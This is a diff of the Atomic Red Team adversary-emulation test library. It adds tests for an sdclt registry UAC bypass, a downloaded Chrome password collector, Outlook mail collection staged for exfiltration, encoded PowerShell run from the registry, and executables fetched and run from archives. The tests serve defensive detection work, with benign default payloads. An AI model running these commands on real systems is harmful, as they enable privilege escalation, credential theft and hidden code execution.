| | | | | [Software Packing](../../T1045/T1045.md) | | | | | | | |
|
||||
| | | | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Timestomp](../../T1099/T1099.md) | | | | | | | |
|
||||
| | | | | [Trusted Developer Utilities](../../T1127/T1127.md) | | | | | | | |
|
||||
|
||||
+250
-12
@@ -1005,6 +1005,26 @@ persistence:
|
||||
2. Navigate to [manifest.json](./src/manifest.json)
|
||||
|
||||
3. Then click 'Open'
|
||||
- name: Edge Chromium Addon - VPN
|
||||
description: 'Adversaries may use VPN extensions in an attempt to hide traffic
|
||||
sent from a compromised host. This will install one (of many) available VPNS
|
||||
in the Edge add-on store.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
- macos
|
||||
executor:
|
||||
name: manual
|
||||
steps: |
|
||||
1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj
|
||||
in Edge Chromium
|
||||
|
||||
2. Click 'Get'
|
||||
cleanup: |-
|
||||
1. Navigate to "..." menu in top right of browser and select.
|
||||
2. In drop down, click on "Extensions".
|
||||
3. Remove the Extension.
|
||||
T1042:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
@@ -6054,6 +6074,30 @@ defense-evasion:
|
||||
cleanup_command: |
|
||||
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
|
||||
del "c:\testbypass.exe" >nul 2>nul
|
||||
- name: Bypass UAC using sdclt DelegateExecute
|
||||
description: "Bypasses User Account Control using a fileless method, registry
|
||||
only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
|
||||
- sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
|
||||
from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command.to.execute:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: cmd.exe /c notepad.exe
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
|
||||
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
|
||||
Start-Process -FilePath $env:windir\system32\sdclt.exe
|
||||
Start-Sleep -s 3
|
||||
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
|
||||
-Force -ErrorAction Ignore
|
||||
|
||||
'
|
||||
T1191:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
@@ -11234,6 +11278,39 @@ defense-evasion:
|
||||
-Name #{registry_entry_storage}
|
||||
|
||||
'
|
||||
- name: Execution from Compressed File
|
||||
description: 'Mimic execution of compressed executable. When successfully executed,
|
||||
calculator.exe will open.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
exe_payload:
|
||||
description: EXE to execute
|
||||
type: Path
|
||||
default: "%temp%\\temp_T1027.zip\\T1027.exe"
|
||||
url_path:
|
||||
description: url to download Exe
|
||||
type: url
|
||||
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
|
||||
dependency_executor_name: powershell
|
||||
elevation_required: true
|
||||
dependencies:
|
||||
- description: T1027.exe must exist on disk at specified location
|
||||
prereq_command: 'if (Test-Path #{exe_payload}) {exit 0} else {exit 1}'
|
||||
get_prereq_command: |-
|
||||
Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
|
||||
Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\"
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: '"#{exe_payload}"
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
taskkill /f /im calculator.exe >nul 2>nul
|
||||
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
|
||||
del /Q "%temp%\T1027.zip" >nul 2>nul
|
||||
T1502:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
@@ -14585,6 +14662,30 @@ privilege-escalation:
|
||||
cleanup_command: |
|
||||
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
|
||||
del "c:\testbypass.exe" >nul 2>nul
|
||||
- name: Bypass UAC using sdclt DelegateExecute
|
||||
description: "Bypasses User Account Control using a fileless method, registry
|
||||
only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
|
||||
- sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
|
||||
from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command.to.execute:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: cmd.exe /c notepad.exe
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
|
||||
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
|
||||
Start-Process -FilePath $env:windir\system32\sdclt.exe
|
||||
Start-Sleep -s 3
|
||||
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
|
||||
-Force -ErrorAction Ignore
|
||||
|
||||
'
|
||||
T1038:
|
||||
technique:
|
||||
x_mitre_permissions_required:
|
||||
@@ -17999,9 +18100,9 @@ discovery:
|
||||
SilentlyContinue -Force
|
||||
|
||||
'
|
||||
- name: List Google Chrome Bookmarks on Windows with command prompt.
|
||||
- name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
|
||||
description: |
|
||||
Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
supported_platforms:
|
||||
- windows
|
||||
@@ -18009,6 +18110,17 @@ discovery:
|
||||
name: command_prompt
|
||||
command: 'where /R C:\Users\ Bookmarks
|
||||
|
||||
'
|
||||
- name: List Mozilla Firefox bookmarks on Windows with command prompt.
|
||||
description: |
|
||||
Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database.
|
||||
Upon execution, paths that contain bookmark files will be displayed.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: 'where /R C:\Users\ places.sqlite
|
||||
|
||||
'
|
||||
'':
|
||||
technique:
|
||||
@@ -21400,6 +21512,37 @@ credential-access:
|
||||
command: 'pypykatz live registry
|
||||
|
||||
'
|
||||
- name: Run Chrome-password Collector
|
||||
description: |
|
||||
A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
|
||||
|
||||
Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb.
|
||||
|
||||
Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for modified Sysinternals
|
||||
type: String
|
||||
default: "$env:TEMP"
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'Modified Sysinternals must be located at #{file_path}'
|
||||
prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit
|
||||
1}'
|
||||
get_prereq_command: |-
|
||||
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
|
||||
Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force
|
||||
Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
Set-Location -path "#{file_path}\Sysinternals";
|
||||
./accesschk.exe -accepteula .;
|
||||
cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction
|
||||
Ignore'
|
||||
T1081:
|
||||
technique:
|
||||
x_mitre_permissions_required:
|
||||
@@ -23030,6 +23173,89 @@ execution:
|
||||
command: 'start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
|
||||
|
||||
'
|
||||
T1106:
|
||||
technique:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- Administrator
|
||||
- SYSTEM
|
||||
x_mitre_data_sources:
|
||||
- API monitoring
|
||||
- Process monitoring
|
||||
name: Execution through API
|
||||
description: |-
|
||||
Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
|
||||
|
||||
Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
|
||||
|
||||
* CreateProcessA() and CreateProcessW(),
|
||||
* CreateProcessAsUserA() and CreateProcessAsUserW(),
|
||||
* CreateProcessInternalA() and CreateProcessInternalW(),
|
||||
* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
|
||||
* LoadLibraryA() and LoadLibraryW(),
|
||||
* LoadLibraryExA() and LoadLibraryExW(),
|
||||
* LoadModule(),
|
||||
* LoadPackagedLibrary(),
|
||||
* WinExec(),
|
||||
* ShellExecuteA() and ShellExecuteW(),
|
||||
* ShellExecuteExA() and ShellExecuteExW()
|
||||
x_mitre_remote_support: false
|
||||
id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
|
||||
x_mitre_platforms:
|
||||
- Windows
|
||||
object_marking_refs:
|
||||
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
|
||||
x_mitre_version: '1.0'
|
||||
type: attack-pattern
|
||||
x_mitre_detection: Monitoring API calls may generate a significant amount of
|
||||
data and may not be directly useful for defense unless collected under specific
|
||||
circumstances, since benign use of Windows API functions such as CreateProcess
|
||||
are common and difficult to distinguish from malicious behavior. Correlation
|
||||
of other events with behavior surrounding API function calls using API monitoring
|
||||
will provide additional context to an event that may assist in determining
|
||||
if it is due to malicious behavior. Correlation of activity by process lineage
|
||||
by process ID may be sufficient.
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
x_mitre_contributors:
|
||||
- Stefan Kanthak
|
||||
created: '2017-05-31T21:31:17.472Z'
|
||||
kill_chain_phases:
|
||||
- kill_chain_name: mitre-attack
|
||||
phase_name: execution
|
||||
external_references:
|
||||
- external_id: T1106
|
||||
source_name: mitre-attack
|
||||
url: https://attack.mitre.org/techniques/T1106
|
||||
- source_name: Microsoft CreateProcess
|
||||
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
|
||||
5, 2014.
|
||||
url: http://msdn.microsoft.com/en-us/library/ms682425
|
||||
- source_name: Kanthak Verifier
|
||||
description: Kanthak, S. (2017). Application Verifier Provider. Retrieved
|
||||
February 13, 2017.
|
||||
url: https://skanthak.homepage.t-online.de/verifier.html
|
||||
modified: '2019-07-17T20:10:02.128Z'
|
||||
identifier: T1106
|
||||
atomic_tests:
|
||||
- name: Execution through API - CreateProcess
|
||||
description: Execute program by leveraging Win32 API's. By default, this will
|
||||
launch calc.exe from the command prompt.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Location of the CSharp source_file
|
||||
type: Path
|
||||
default: PathToAtomicsFolder\T1106\src\CreateProcess.cs
|
||||
output_file:
|
||||
description: Location of the payload
|
||||
type: Path
|
||||
default: "%tmp%\\T1106.exe"
|
||||
executor:
|
||||
command: |
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
|
||||
%tmp/T1106.exe
|
||||
name: command_prompt
|
||||
T1118:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
@@ -26484,7 +26710,7 @@ execution:
|
||||
dependencies:
|
||||
- description: PsExec tool from Sysinternals must exist on disk at specified
|
||||
location (#{psexec_exe})
|
||||
prereq_command: if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
||||
prereq_command: if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
||||
get_prereq_command: |-
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
|
||||
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
|
||||
@@ -28008,7 +28234,7 @@ lateral-movement:
|
||||
dependencies:
|
||||
- description: PsExec tool from Sysinternals must exist on disk at specified
|
||||
location (#{psexec_exe})
|
||||
prereq_command: if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
||||
prereq_command: if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
||||
get_prereq_command: |-
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
|
||||
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
|
||||
@@ -28584,26 +28810,38 @@ collection:
|
||||
modified: '2019-10-08T20:59:13.652Z'
|
||||
identifier: T1114
|
||||
atomic_tests:
|
||||
- name: T1114 Email Collection with PowerShell
|
||||
description: 'Search through local Outlook installation, extract mail, compress
|
||||
the contents, and saves everything to a directory for later exfiltration.
|
||||
- name: Email Collection with PowerShell Get-Inbox
|
||||
description: |
|
||||
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
|
||||
Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
|
||||
|
||||
'
|
||||
Note: Outlook is required, but no email account necessary to produce artifacts.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for Get-Inbox.ps1
|
||||
type: String
|
||||
default: PathToAtomicsFolder\T1114\src
|
||||
output_file:
|
||||
description: Output file path
|
||||
type: String
|
||||
default: "$home\\desktop\\mail.csv"
|
||||
default: "$env:TEMP\\mail.csv"
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'Get-Inbox.ps1 must be located at #{file_path}'
|
||||
prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
|
||||
1}'
|
||||
get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/src/Get-Inbox.ps1"
|
||||
-OutFile "#{file_path}\Get-Inbox.ps1"
|
||||
executor:
|
||||
name: command_prompt
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: 'powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1
|
||||
command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
|
||||
-file #{output_file}
|
||||
|
||||
'
|
||||
cleanup_command: 'del #{output_file} >nul 2>&1
|
||||
cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
|
||||
|
||||
'
|
||||
T1056:
|
||||
|
||||
@@ -167,6 +167,8 @@ The /proc filesystem on Linux contains a great deal of information regarding the
|
||||
|
||||
- [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz)
|
||||
|
||||
- [Atomic Test #17 - Run Chrome-password Collector](#atomic-test-17---run-chrome-password-collector)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -940,4 +942,56 @@ pip3 install pypykatz
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #17 - Run Chrome-password Collector
|
||||
A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
|
||||
|
||||
Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb.
|
||||
|
||||
Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| file_path | File path for modified Sysinternals | String | $env:TEMP|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
Set-Location -path "#{file_path}\Sysinternals";
|
||||
./accesschk.exe -accepteula .;
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: Modified Sysinternals must be located at #{file_path}
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
|
||||
Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force
|
||||
Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -554,3 +554,39 @@ atomic_tests:
|
||||
elevation_required: true
|
||||
command: |
|
||||
pypykatz live registry
|
||||
|
||||
- name: Run Chrome-password Collector
|
||||
description: |
|
||||
A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
|
||||
|
||||
Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb.
|
||||
|
||||
Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for modified Sysinternals
|
||||
type: String
|
||||
default: $env:TEMP
|
||||
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Modified Sysinternals must be located at #{file_path}
|
||||
prereq_command: |
|
||||
if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
|
||||
Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force
|
||||
Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
Set-Location -path "#{file_path}\Sysinternals";
|
||||
./accesschk.exe -accepteula .;
|
||||
|
||||
cleanup_command: |
|
||||
Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore
|
||||
@@ -18,6 +18,8 @@ Another example of obfuscation is through the use of steganography, a technique
|
||||
|
||||
- [Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3---execute-base64-encoded-powershell-from-windows-registry)
|
||||
|
||||
- [Atomic Test #4 - Execution from Compressed File](#atomic-test-4---execution-from-compressed-file)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -125,4 +127,53 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Execution from Compressed File
|
||||
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| exe_payload | EXE to execute | Path | %temp%\temp_T1027.zip\T1027.exe|
|
||||
| url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
"#{exe_payload}"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
taskkill /f /im calculator.exe >nul 2>nul
|
||||
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
|
||||
del /Q "%temp%\T1027.zip" >nul 2>nul
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: T1027.exe must exist on disk at specified location
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path #{exe_payload}) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
|
||||
Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
+104
-67
@@ -3,78 +3,115 @@ attack_technique: T1027
|
||||
display_name: Obfuscated Files or Information
|
||||
|
||||
atomic_tests:
|
||||
- name: Decode base64 Data into Script
|
||||
description: |
|
||||
Creates a base64-encoded data file and decodes it into an executable shell script
|
||||
- name: Decode base64 Data into Script
|
||||
description: |
|
||||
Creates a base64-encoded data file and decodes it into an executable shell script
|
||||
|
||||
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
|
||||
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
|
||||
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
|
||||
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
|
||||
chmod +x /tmp/art.sh
|
||||
/tmp/art.sh
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
|
||||
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
|
||||
chmod +x /tmp/art.sh
|
||||
/tmp/art.sh
|
||||
|
||||
- name: Execute base64-encoded PowerShell
|
||||
description: |
|
||||
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
|
||||
|
||||
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
powershell_command:
|
||||
description: PowerShell command to encode
|
||||
type: String
|
||||
default: Write-Host "Hey, Atomic!"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
$OriginalCommand = '#{powershell_command}'
|
||||
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
||||
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
||||
$EncodedCommand
|
||||
powershell.exe -EncodedCommand $EncodedCommand
|
||||
- name: Execute base64-encoded PowerShell
|
||||
description: |
|
||||
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
|
||||
|
||||
- name: Execute base64-encoded PowerShell from Windows Registry
|
||||
description: |
|
||||
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
|
||||
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
powershell_command:
|
||||
description: PowerShell command to encode
|
||||
type: String
|
||||
default: Write-Host "Hey, Atomic!"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
$OriginalCommand = '#{powershell_command}'
|
||||
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
||||
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
||||
$EncodedCommand
|
||||
powershell.exe -EncodedCommand $EncodedCommand
|
||||
|
||||
Upon successful execution, powershell will execute encoded command and read/write from the registry.
|
||||
- name: Execute base64-encoded PowerShell from Windows Registry
|
||||
description: |
|
||||
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
powershell_command:
|
||||
description: PowerShell command to encode
|
||||
type: String
|
||||
default: Write-Host "Hey, Atomic!"
|
||||
registry_key_storage:
|
||||
description: Windows Registry Key to store code
|
||||
type: String
|
||||
default: HKCU:Software\Microsoft\Windows\CurrentVersion
|
||||
registry_entry_storage:
|
||||
description: Windows Registry entry to store code under key
|
||||
type: String
|
||||
default: Debug
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
$OriginalCommand = '#{powershell_command}'
|
||||
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
||||
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
||||
$EncodedCommand
|
||||
Upon successful execution, powershell will execute encoded command and read/write from the registry.
|
||||
|
||||
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
|
||||
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
powershell_command:
|
||||
description: PowerShell command to encode
|
||||
type: String
|
||||
default: Write-Host "Hey, Atomic!"
|
||||
registry_key_storage:
|
||||
description: Windows Registry Key to store code
|
||||
type: String
|
||||
default: HKCU:Software\Microsoft\Windows\CurrentVersion
|
||||
registry_entry_storage:
|
||||
description: Windows Registry entry to store code under key
|
||||
type: String
|
||||
default: Debug
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
$OriginalCommand = '#{powershell_command}'
|
||||
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
||||
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
||||
$EncodedCommand
|
||||
|
||||
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
|
||||
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
|
||||
|
||||
- name: Execution from Compressed File
|
||||
description: |
|
||||
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
input_arguments:
|
||||
exe_payload:
|
||||
description: EXE to execute
|
||||
type: Path
|
||||
default: '%temp%\temp_T1027.zip\T1027.exe'
|
||||
url_path:
|
||||
description: url to download Exe
|
||||
type: url
|
||||
default: 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip'
|
||||
|
||||
dependency_executor_name: powershell
|
||||
elevation_required: true
|
||||
dependencies:
|
||||
- description: |
|
||||
T1027.exe must exist on disk at specified location
|
||||
prereq_command: |
|
||||
